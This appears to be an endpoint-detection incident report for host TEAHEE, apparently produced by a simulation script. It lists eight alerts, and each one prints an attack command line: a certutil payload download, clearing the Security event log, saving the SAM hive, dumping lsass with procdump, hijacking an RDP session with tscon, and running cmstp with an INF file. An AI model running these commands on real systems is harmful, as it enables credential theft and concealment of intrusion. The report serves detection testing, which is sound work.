Incident Overview

Incident ID CINC-20251220-78688A16
Severity Critical (90)
Status new
Alert Count 8
Host Count 1

Timeline

First Seen 2025-12-18 10:57:39
Last Seen 2025-12-18 10:58:54
Duration 0d 0h 1m
Created 2025-12-20 13:23
Updated 2026-01-13 15:14

Kill Chain Analysis

Observed Tactics: Defense Evasion, Command and Control, Credential Access, Lateral Movement, Execution
Techniques: CMSTP, Ingress Tool Transfer, Indicator Removal, OS Credential Dumping, Remote Desktop Protocol, User Execution

Affected Hosts (1)

TEAHEE

Related Alerts (8)

Alert 1
Severity High
Status new
Hostname TEAHEE
Description A CMSTP.exe process appears to have been supplied with a suspicious INF file. CMSTP.exe may be abused to load and execute DLLs and/or COM scriptlets (SCT) from remote servers. Review the command line.
Tactic Defense Evasion
Command Line cmstp /s /ns C:\Users\dokji\AppData\Local\Temp\test.inf
Time 12-18 10:58

Alert 2
Severity High
Status new
Hostname TEAHEE
Description Certutil was observed downloading file(s) from a remote location. This process is rarely used benignly in this context. Please review the command line and process tree.
Tactic Command and Control
Command Line certutil -urlcache -split -f http://127.0.0.1/mal.exe C:\Users\dokji\AppData\Local\Temp\cert_test.exe
Time 12-18 10:58

Alert 3
Severity High
Status new
Hostname TEAHEE
Description A process removed or cleared Windows Event Logs. Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Investigate the process tree.
Tactic Defense Evasion
Command Line wevtutil cl Security
Time 12-18 10:58

Alert 4
Severity Critical
Status new
Hostname TEAHEE
Description A process saved the Security Account Manager (SAM) or SYSTEM hive to disk. If this is unexpected, it likely indicates credential theft. Investigate the process tree.
Tactic Credential Access
Command Line reg save HKLM\SAM C:\Users\dokji\AppData\Local\Temp\sam.hiv
Time 12-18 10:58

Alert 5
Severity High
Status new
Hostname TEAHEE
Description A command line indicates an attempt to hijack a remote desktop protocol session. Review the process tree.
Tactic Lateral Movement
Command Line C:\WINDOWS\system32\cmd.exe /c "tscon 1 /dest:rdp-tcp#0"
Time 12-18 10:58

Alert 6
Severity High
Status new
Hostname TEAHEE
Description An unusual process accessed lsass. This might indicate an attempt to dump credentials. Investigate the process tree.
Tactic Credential Access
Command Line C:\WINDOWS\system32\cmd.exe /c "procdump -ma lsass.exe C:\Users\dokji\AppData\Local\Temp\lsass.dmp"
Time 12-18 10:58

Alert 7
Severity High
Status new
Hostname TEAHEE
Description An unusual process accessed lsass. This might indicate an attempt to dump credentials. Investigate the process tree.
Tactic Credential Access
Command Line C:\WINDOWS\system32\cmd.exe /c "procdump -ma lsass.exe C:\Users\dokji\AppData\Local\Temp\lsass.dmp"
Time 12-18 10:58

Alert 8
Severity Informational
Status new
Hostname TEAHEE
Description A process has written a known EICAR test file. Review the files written by the triggered process.
Tactic Execution
Command Line "python" mega_incident_generator.py --rounds 2 --interval 30
Time 12-18 10:57